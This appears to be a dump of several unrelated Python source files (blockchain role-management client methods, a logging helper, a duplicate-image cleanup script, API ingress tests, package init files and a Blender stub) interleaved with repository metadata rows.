def confirm_add_role_owners(self, key, proposal_id, role_id, user_id, reason):
batch_list, signature = role_transaction_creation.confirm_add_role_owners(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_role_owners(self, key, proposal_id, role_id, user_id, reason):
batch_list, signature = role_transaction_creation.reject_add_role_owners(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_role_members(
self, key, proposal_id, role_id, user_id, reason, metadata
):
batch_list, signature = role_transaction_creation.propose_add_role_members(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_role_members(self, key, proposal_id, role_id, user_id, reason):
batch_list, signature = role_transaction_creation.confirm_add_role_members(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_role_members(self, key, proposal_id, role_id, user_id, reason):
batch_list, signature = role_transaction_creation.reject_add_role_members(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_role_tasks(
self, key, proposal_id, role_id, task_id, reason, metadata
):
batch_list, signature = role_transaction_creation.propose_add_role_tasks(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
task_id=task_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_role_tasks(self, key, proposal_id, role_id, task_id, reason):
batch_list, signature = role_transaction_creation.confirm_add_role_tasks(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
task_id=task_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_role_tasks(self, key, proposal_id, role_id, task_id, reason):
batch_list, signature = role_transaction_creation.reject_add_role_tasks(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
role_id=role_id,
task_id=task_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def create_task(self, key, task_id, task_name, admins, owners, metadata):
batch_list, signature = task_transaction_creation.create_task(
txn_key=key,
batch_key=self._key,
task_id=task_id,
task_name=task_name,
admins=admins,
owners=owners,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_task_admins(
self, key, proposal_id, task_id, user_id, reason, metadata
):
batch_list, signature = task_transaction_creation.propose_add_task_admins(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_task_admins(self, key, proposal_id, task_id, user_id, reason):
batch_list, signature = task_transaction_creation.confirm_add_task_admins(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_task_admins(self, key, proposal_id, task_id, user_id, reason):
batch_list, signature = task_transaction_creation.reject_add_task_admins(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_add_task_owners(
self, key, proposal_id, task_id, user_id, reason, metadata
):
batch_list, signature = task_transaction_creation.propose_add_task_owner(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def confirm_add_task_owners(self, key, proposal_id, task_id, user_id, reason):
batch_list, signature = task_transaction_creation.confirm_add_task_owners(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def reject_add_task_owners(self, key, proposal_id, task_id, user_id, reason):
batch_list, signature = task_transaction_creation.reject_add_task_owners(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_delete_task_admins(
self, key, proposal_id, task_id, user_id, reason, metadata
):
batch_list, signature = task_transaction_creation.propose_remove_task_admins(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
def propose_delete_task_owners(
self, key, proposal_id, task_id, user_id, reason, metadata
):
batch_list, signature = task_transaction_creation.propose_remove_task_owners(
txn_key=key,
batch_key=self._key,
proposal_id=proposal_id,
task_id=task_id,
user_id=user_id,
reason=reason,
metadata=metadata,
)
self._client.send_batches(batch_list)
return self._client.get_statuses([signature], wait=10)
| 36.279597 | 85 | 0.634729 | 1,765 | 14,403 | 4.793201 | 0.079887 | 0.08156 | 0.053901 | 0.092435 | 0.824113 | 0.811348 | 0.791608 | 0.777305 | 0.777305 | 0.777305 | 0 | 0.007135 | 0.279872 | 14,403 | 396 | 86 | 36.371212 | 0.808523 | 0.045199 | 0 | 0.672515 | 0 | 0 | 0.002548 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081871 | false | 0 | 0.020468 | 0 | 0.184211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cc143f2a232ecdca77df295342ee14db0d1f3315 | 137 | py | Python | annasys/console/success.py | apoulakos/python-console | 1506a1f24eb6cacd585479eef93268af5f29a4a3 | [
"MIT"
] | 1 | 2019-03-17T22:51:45.000Z | 2019-03-17T22:51:45.000Z | annasys/console/success.py | apoulakos/python-console | 1506a1f24eb6cacd585479eef93268af5f29a4a3 | [
"MIT"
] | null | null | null | annasys/console/success.py | apoulakos/python-console | 1506a1f24eb6cacd585479eef93268af5f29a4a3 | [
"MIT"
] | null | null | null | from .log import log
def success(message):
log('SUCCESS', message, fg='green', bold=True, color_status=True, include_brackets=True)
| 27.4 | 92 | 0.737226 | 20 | 137 | 4.95 | 0.7 | 0.282828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.124088 | 137 | 4 | 93 | 34.25 | 0.825 | 0 | 0 | 0 | 0 | 0 | 0.087591 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0401e87d3ec083aaf907ca099e0d5d753b6f5f75 | 169 | py | Python | python/smallest.py | TechieHelper/Codewars | 98ea8deb14ae1422162895f481e4175ab5868955 | [
"MIT"
] | null | null | null | python/smallest.py | TechieHelper/Codewars | 98ea8deb14ae1422162895f481e4175ab5868955 | [
"MIT"
] | null | null | null | python/smallest.py | TechieHelper/Codewars | 98ea8deb14ae1422162895f481e4175ab5868955 | [
"MIT"
] | null | null | null | def smallest(n):
    # Codewars "Find the smallest" (completed from the commented-out sketch):
    # move one digit of n to another position so the result is minimal;
    # returns [smallest number, index taken from, index inserted at].
    s = str(n)
    best = None
    for i in range(len(s)):
        removed = s[:i] + s[i + 1:]  # digits with the one at position i taken out
        for j in range(len(s)):
            candidate = int(removed[:j] + s[i] + removed[j:])
            if best is None or candidate < best[0]:
                best = [candidate, i, j]
    return best
# print(smallest(261235)) | 24.142857 | 38 | 0.467456 | 25 | 169 | 3.16 | 0.56 | 0.151899 | 0.253165 | 0.329114 | 0.35443 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054054 | 0.343195 | 169 | 7 | 39 | 24.142857 | 0.657658 | 0.91716 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
040eaf851182bf607bae04d8ae394e4ca0c90427 | 21 | py | Python | ndview/__init__.py | danionella/ndview | d1003113e352a4a9b29a0b078df0d21f1514d877 | [
"MIT"
] | 2 | 2020-11-16T10:33:08.000Z | 2022-01-06T08:20:41.000Z | ndview/__init__.py | danionella/ndview | d1003113e352a4a9b29a0b078df0d21f1514d877 | [
"MIT"
] | null | null | null | ndview/__init__.py | danionella/ndview | d1003113e352a4a9b29a0b078df0d21f1514d877 | [
"MIT"
] | null | null | null | from .core import ndv | 21 | 21 | 0.809524 | 4 | 21 | 4.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 21 | 1 | 21 | 21 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
042d17a52af06fc6921bba7ad6d32a6db74b8640 | 252 | py | Python | tests/test_init.py | FeatCrush/jupyterlab_iframe | f80ee846b32975e6c46e67bf278fbfa281049a91 | [
"Apache-2.0"
] | 1 | 2020-09-22T03:15:49.000Z | 2020-09-22T03:15:49.000Z | tests/test_init.py | FeatCrush/jupyterlab_iframe | f80ee846b32975e6c46e67bf278fbfa281049a91 | [
"Apache-2.0"
] | null | null | null | tests/test_init.py | FeatCrush/jupyterlab_iframe | f80ee846b32975e6c46e67bf278fbfa281049a91 | [
"Apache-2.0"
] | null | null | null | # for Coverage
from jupyterlab_iframe.__init__ import _jupyter_server_extension_paths
class TestInit:
def test__jupyter_server_extension_paths(self):
assert _jupyter_server_extension_paths() == [{"module": "jupyterlab_iframe.extension"}]
| 31.5 | 95 | 0.801587 | 29 | 252 | 6.310345 | 0.62069 | 0.213115 | 0.360656 | 0.442623 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119048 | 252 | 7 | 96 | 36 | 0.824324 | 0.047619 | 0 | 0 | 0 | 0 | 0.138655 | 0.113445 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
043e3870fa1463daab648d3929f4fdc0cf575a3e | 3,251 | py | Python | python/image-tools/photo-recovery/remove-duplicate-images.py | bmaupin/graveyard | 71d52fe6589ce13dfe7433906d1aa50df48c9f94 | [
"MIT"
] | 1 | 2019-11-23T10:44:58.000Z | 2019-11-23T10:44:58.000Z | python/image-tools/photo-recovery/remove-duplicate-images.py | bmaupin/graveyard | 71d52fe6589ce13dfe7433906d1aa50df48c9f94 | [
"MIT"
] | 8 | 2020-07-16T07:14:12.000Z | 2020-10-14T17:25:33.000Z | python/image-tools/photo-recovery/remove-duplicate-images.py | bmaupin/graveyard | 71d52fe6589ce13dfe7433906d1aa50df48c9f94 | [
"MIT"
] | 1 | 2019-11-23T10:45:00.000Z | 2019-11-23T10:45:00.000Z | #!/usr/bin/env python
import os
import os.path
import shutil
import sys
import EXIF
source = sys.argv[1]
if not os.path.exists(source):
sys.exit('Enter a valid source directory\n')
for root, dirs, files in os.walk(source, topdown=False):
for file in files:
# only process duplicates
if file.rsplit('.', 1)[0][-3:] == '(2)':
original = file.replace('(2)', '', 1)
d = open(os.path.join(root,file), 'rb')
dup_tags = EXIF.process_file(d)
o = open(os.path.join(root,original), 'rb')
org_tags = EXIF.process_file(o)
if len(dup_tags) == 0:
                print('deleting duplicate: no tags')
os.remove(os.path.join(root, file))
continue
if len(org_tags) == 0:
                print('deleting original: no tags')
os.remove(os.path.join(root, original))
os.rename(os.path.join(root, file), os.path.join(root, original))
continue
if 'EXIF DateTimeOriginal' not in dup_tags and 'Image DateTime' not in dup_tags:
                print('deleting duplicate: no EXIF DateTimeOriginal and no Image DateTime')
os.remove(os.path.join(root, file))
continue
if 'EXIF DateTimeOriginal' not in org_tags and 'Image DateTime' not in org_tags:
                print('deleting original: no EXIF DateTimeOriginal and no Image DateTime')
os.remove(os.path.join(root, original))
os.rename(os.path.join(root, file), os.path.join(root, original))
continue
if 'EXIF DateTimeOriginal' not in dup_tags:
                print('deleting duplicate: no EXIF DateTimeOriginal')
os.remove(os.path.join(root, file))
continue
if 'EXIF DateTimeOriginal' not in org_tags:
                print('deleting original: no EXIF DateTimeOriginal')
os.remove(os.path.join(root, original))
os.rename(os.path.join(root, file), os.path.join(root, original))
continue
if 'Image DateTime' not in dup_tags:
                print('deleting duplicate: no Image DateTime')
os.remove(os.path.join(root, file))
continue
if 'Image DateTime' not in org_tags:
                print('deleting original: no Image DateTime')
os.remove(os.path.join(root, original))
os.rename(os.path.join(root, file), os.path.join(root, original))
continue
if 'Image DateTime' in dup_tags and str(dup_tags['Image DateTime']).find('201') == -1:
                print('deleting duplicate: Image DateTime improperly formatted')
os.remove(os.path.join(root, file))
continue
if 'Image DateTime' in org_tags and str(org_tags['Image DateTime']).find('201') == -1:
                print('deleting original: Image DateTime improperly formatted')
os.remove(os.path.join(root, original))
os.rename(os.path.join(root, file), os.path.join(root, original))
continue
print('duplicate %s still exists' % (file))
| 43.932432 | 98 | 0.563519 | 400 | 3,251 | 4.535 | 0.1675 | 0.079383 | 0.121279 | 0.169791 | 0.752481 | 0.723815 | 0.720507 | 0.720507 | 0.671996 | 0.65215 | 0 | 0.007802 | 0.329745 | 3,251 | 73 | 99 | 44.534247 | 0.82469 | 0.013534 | 0 | 0.403226 | 0 | 0 | 0.225726 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.080645 | null | null | 0.177419 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0453956b5055ce55d54bce7b3aeba86a86d2b12b | 31 | py | Python | pywiktionary/IPA/__init__.py | abuccts/wikt2pron | bfb9c3a3d5d71363ca7e9f8d9967823adcfd8038 | [
"BSD-2-Clause"
] | 22 | 2018-02-22T13:56:27.000Z | 2022-03-14T13:31:13.000Z | pywiktionary/IPA/__init__.py | abuccts/wikt2pron | bfb9c3a3d5d71363ca7e9f8d9967823adcfd8038 | [
"BSD-2-Clause"
] | 5 | 2017-07-21T13:16:15.000Z | 2019-07-05T05:42:57.000Z | pywiktionary/IPA/__init__.py | abuccts/wikt2pron | bfb9c3a3d5d71363ca7e9f8d9967823adcfd8038 | [
"BSD-2-Clause"
] | 4 | 2017-11-26T14:18:40.000Z | 2021-12-23T02:00:09.000Z | from .IPA import IPA_to_XSAMPA
| 15.5 | 30 | 0.83871 | 6 | 31 | 4 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f0ed7b6b51c49e9a6e8e5d6f52213a0283c981dd | 114 | py | Python | tests/test_defectio.py | Darkflame72/revolt.py | 9bb8ca695bd423d9237788b59f79aa3d52946036 | [
"MIT"
] | 26 | 2021-08-29T02:56:52.000Z | 2022-03-11T06:44:22.000Z | tests/test_defectio.py | Darkflame72/revolt.py | 9bb8ca695bd423d9237788b59f79aa3d52946036 | [
"MIT"
] | 36 | 2021-09-03T02:18:28.000Z | 2022-03-01T08:27:57.000Z | tests/test_defectio.py | Darkflame72/revolt.py | 9bb8ca695bd423d9237788b59f79aa3d52946036 | [
"MIT"
] | 18 | 2021-08-29T17:37:58.000Z | 2022-03-31T15:08:15.000Z | import defectio
def test_version() -> None:
"""Mock version."""
assert defectio.__version__ == "0.2.2a"
| 16.285714 | 43 | 0.640351 | 14 | 114 | 4.857143 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032609 | 0.192982 | 114 | 6 | 44 | 19 | 0.706522 | 0.114035 | 0 | 0 | 0 | 0 | 0.063158 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
aceefb86a4e5ecf08f3982f553c0a242f41c7268 | 52 | py | Python | pyunc/__main__.py | jstutters/PyUNC | 15f50d868ce2cfc29eeebb3b932cd5834b9e8cee | [
"MIT"
] | null | null | null | pyunc/__main__.py | jstutters/PyUNC | 15f50d868ce2cfc29eeebb3b932cd5834b9e8cee | [
"MIT"
] | 3 | 2018-08-22T10:02:48.000Z | 2020-03-13T15:25:13.000Z | pyunc/__main__.py | jstutters/PyUNC | 15f50d868ce2cfc29eeebb3b932cd5834b9e8cee | [
"MIT"
] | null | null | null | from pyunc.cli import unc_to_nifti
unc_to_nifti()
| 10.4 | 34 | 0.807692 | 10 | 52 | 3.8 | 0.7 | 0.263158 | 0.526316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134615 | 52 | 4 | 35 | 13 | 0.844444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
4a0ead8d2f771422a5baabc7ea892499687bc7c0 | 5,461 | py | Python | tests/routes/test_ingress.py | LinuxForHealth/connect | 0bb2edc2923633c68b3247006abe98001605adbd | [
"Apache-2.0"
] | 33 | 2020-06-16T11:47:03.000Z | 2022-03-24T02:41:00.000Z | tests/routes/test_ingress.py | LinuxForHealth/connect | 0bb2edc2923633c68b3247006abe98001605adbd | [
"Apache-2.0"
] | 470 | 2020-06-12T01:18:43.000Z | 2022-02-20T23:08:00.000Z | tests/routes/test_ingress.py | LinuxForHealth/connect | 0bb2edc2923633c68b3247006abe98001605adbd | [
"Apache-2.0"
] | 30 | 2020-06-12T19:36:09.000Z | 2022-01-31T15:25:35.000Z | import pytest
from connect.clients import kafka, nats
from connect.config import get_settings
from connect.workflows.core import CoreWorkflow
from unittest.mock import AsyncMock
@pytest.mark.parametrize(
"fixture_name,data_format",
[
("x12_fixture", "X12-005010"),
("fhir_fixture", "FHIR-R4"),
("hl7_fixture", "HL7-V2"),
],
)
@pytest.mark.asyncio
async def test_ingress_post(
fixture_name,
data_format,
request,
async_test_client,
mock_async_kafka_producer,
monkeypatch,
settings,
):
"""
Parameterized /ingress [POST] test with X12, FHIR, and HL7 inputs
:param fixture_name: The name of the pytest fixture used for parameterized testing.
:param data_format: The expected data format for the test case.
:param request: The pytest request fixture used to dynamically access test case fixtures
:param async_test_client: An async test client
:param mock_async_kafka_producer: Mock async kafka producer used to simulate messaging interactions
:param monkeypatch: The pytest monkeypatch fixture.
:param settings: Mocked connect configuration settings.
"""
fixture = request.getfixturevalue(fixture_name)
with monkeypatch.context() as m:
m.setattr(kafka, "ConfluentAsyncKafkaProducer", mock_async_kafka_producer)
m.setattr(CoreWorkflow, "synchronize", AsyncMock())
m.setattr(nats, "get_nats_client", AsyncMock(return_value=AsyncMock()))
m.setattr(nats, "get_jetstream_context", AsyncMock(return_value=AsyncMock()))
async with async_test_client as ac:
# remove external server setting
settings.connect_external_fhir_servers = []
ac._transport.app.dependency_overrides[get_settings] = lambda: settings
actual_response = await ac.post("/ingress", json={"data": fixture})
assert actual_response.status_code == 200
actual_json = actual_response.json()
assert actual_json["uuid"]
assert actual_json["operation"] == "POST"
assert actual_json["creation_date"]
assert actual_json["store_date"]
assert actual_json["consuming_endpoint_url"] == "/ingress"
assert actual_json["data"]
assert actual_json["data_format"] == data_format
assert actual_json["status"] == "success"
assert data_format in actual_json["data_record_location"]
assert actual_json["target_endpoint_urls"] == []
assert actual_json["ipfs_uri"] is None
            assert actual_json["elapsed_storage_time"] > 0
assert actual_json["transmit_date"] is None
assert actual_json["elapsed_transmit_time"] is None
assert actual_json["elapsed_total_time"] > 0
assert actual_json["transmission_attributes"] is None
@pytest.mark.asyncio
async def test_ingress_post_422_error(
async_test_client, mock_async_kafka_producer, monkeypatch, settings, x12_fixture
):
"""
    /ingress [POST] test expecting a 422 response when the X12 payload is malformed

    :param async_test_client: An async test client
    :param mock_async_kafka_producer: Mock async kafka producer used to simulate messaging interactions
    :param monkeypatch: The pytest monkeypatch fixture.
    :param settings: Mocked connect configuration settings.
    :param x12_fixture: A valid X12 payload, corrupted by the test to trigger validation failure.
"""
invalid_x12 = x12_fixture.replace("ISA", "IPA")
async with async_test_client as ac:
# remove external server setting
settings.connect_external_fhir_servers = []
ac._transport.app.dependency_overrides[get_settings] = lambda: settings
actual_response = await ac.post("/ingress", json={"data": invalid_x12})
assert actual_response.status_code == 422
@pytest.mark.asyncio
async def test_edi_upload(
dicom_fixture,
tmpdir,
async_test_client,
mock_async_kafka_producer,
monkeypatch,
settings,
):
with monkeypatch.context() as m:
m.setattr(kafka, "ConfluentAsyncKafkaProducer", mock_async_kafka_producer)
m.setattr(CoreWorkflow, "synchronize", AsyncMock())
m.setattr(nats, "get_nats_client", AsyncMock(return_value=AsyncMock()))
m.setattr(nats, "get_jetstream_context", AsyncMock(return_value=AsyncMock()))
async with async_test_client as ac:
# remove external server setting
settings.connect_external_fhir_servers = []
ac._transport.app.dependency_overrides[get_settings] = lambda: settings
actual_response = await ac.post(
"/ingress/upload", files={"file": ("dcm_1.dcm", dicom_fixture)}
)
assert actual_response.status_code == 200
actual_json = actual_response.json()
assert actual_json["uuid"]
assert actual_json["operation"] == "POST"
assert actual_json["creation_date"]
assert actual_json["store_date"]
assert actual_json["consuming_endpoint_url"] == "/ingress/upload"
assert actual_json["data"]
assert actual_json["data_format"] == "DICOM"
assert actual_json["status"] == "success"
assert "DICOM" in actual_json["data_record_location"]
assert actual_json["target_endpoint_urls"] == []
assert actual_json["ipfs_uri"] is None
            assert actual_json["elapsed_storage_time"] > 0
assert actual_json["transmit_date"] is None
assert actual_json["elapsed_transmit_time"] is None
assert actual_json["elapsed_total_time"] > 0
assert actual_json["transmission_attributes"] is None
| 40.154412 | 103 | 0.718733 | 669 | 5,461 | 5.594918 | 0.192825 | 0.09618 | 0.136789 | 0.052899 | 0.825274 | 0.817259 | 0.79081 | 0.79081 | 0.769436 | 0.699973 | 0 | 0.010571 | 0.185863 | 5,461 | 135 | 104 | 40.451852 | 0.831309 | 0.016847 | 0 | 0.643564 | 0 | 0 | 0.187217 | 0.057117 | 0 | 0 | 0 | 0 | 0.366337 | 1 | 0 | false | 0 | 0.049505 | 0 | 0.049505 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4a125558f73775f5099682c5f40af9d6869fc3e5 | 124 | py | Python | declare_qtquick/widgets/api/qtquick3d/effects/__init__.py | likianta/declare-qtquick | 93c2ce49d841ccdeb0272085c5f731139927f0d7 | [
"MIT"
] | 3 | 2021-11-02T03:45:27.000Z | 2022-03-27T05:33:36.000Z | declare_qtquick/widgets/api/qtquick3d/effects/__init__.py | likianta/declare-qtquick | 93c2ce49d841ccdeb0272085c5f731139927f0d7 | [
"MIT"
] | null | null | null | declare_qtquick/widgets/api/qtquick3d/effects/__init__.py | likianta/declare-qtquick | 93c2ce49d841ccdeb0272085c5f731139927f0d7 | [
"MIT"
] | null | null | null | from __declare_qtquick_internals__ import qml_imports
qml_imports.add("QtQuick3D.Effects")
from .__list__ import * # noqa
| 24.8 | 53 | 0.822581 | 16 | 124 | 5.625 | 0.75 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009009 | 0.104839 | 124 | 4 | 54 | 31 | 0.801802 | 0.032258 | 0 | 0 | 0 | 0 | 0.144068 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4a1c06b702794f86d91e058bed98f9eca894f3d4 | 38 | py | Python | AudioRec/__init__.py | joelbarmettlerUZH/AudioRec | 4146a775baeb72fa18de22c78820d9f8a2a95667 | [
"MIT"
] | 5 | 2020-03-06T04:42:34.000Z | 2021-04-23T21:03:34.000Z | AudioRec/__init__.py | joelbarmettlerUZH/AudioRec | 4146a775baeb72fa18de22c78820d9f8a2a95667 | [
"MIT"
] | 1 | 2018-04-07T09:06:00.000Z | 2019-02-09T16:14:43.000Z | AudioRec/__init__.py | joelbarmettlerUZH/AudioRec | 4146a775baeb72fa18de22c78820d9f8a2a95667 | [
"MIT"
] | 2 | 2020-04-06T12:52:34.000Z | 2022-02-16T20:24:23.000Z | from AudioRec.Recorder import Recorder | 38 | 38 | 0.894737 | 5 | 38 | 6.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078947 | 38 | 1 | 38 | 38 | 0.971429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a849a039c1886330eeba0e7dce38eff8d6c87469 | 45 | py | Python | modules/2.79/bpy/types/ShaderNodeBsdfTranslucent.py | cmbasnett/fake-bpy-module | acb8b0f102751a9563e5b5e5c7cd69a4e8aa2a55 | [
"MIT"
] | null | null | null | modules/2.79/bpy/types/ShaderNodeBsdfTranslucent.py | cmbasnett/fake-bpy-module | acb8b0f102751a9563e5b5e5c7cd69a4e8aa2a55 | [
"MIT"
] | null | null | null | modules/2.79/bpy/types/ShaderNodeBsdfTranslucent.py | cmbasnett/fake-bpy-module | acb8b0f102751a9563e5b5e5c7cd69a4e8aa2a55 | [
"MIT"
] | null | null | null | class ShaderNodeBsdfTranslucent:
pass
